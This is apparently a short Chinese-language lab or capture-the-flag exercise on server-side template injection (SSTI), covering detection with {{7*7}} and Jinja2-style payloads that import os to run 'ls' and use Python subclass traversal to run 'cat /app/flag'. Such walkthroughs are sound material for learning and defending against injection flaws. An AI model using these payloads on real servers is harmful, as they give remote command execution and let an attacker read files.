实验名称
简单的ssti
实验简介
是一种针对服务器端模板的注入漏洞。
实验说明
攻击者 将恶意代码输入到模板 服务器在执行时未对恶意代码进行处理 就输出执行
将字符串 当作模板执行
ssti注入就是使其渲染我们想要执行的的字符串
实验步骤
步骤一:
输入 {{7*7}}判断类型
步骤二:
{{url_for.__globals__.__builtins__['__import__']('os').popen('ls').read()}}
步骤三:
{{' '.__class__.__base__.__subclasses__()[133].__init__.__globals__['popen']('cat /app/flag').read()}}
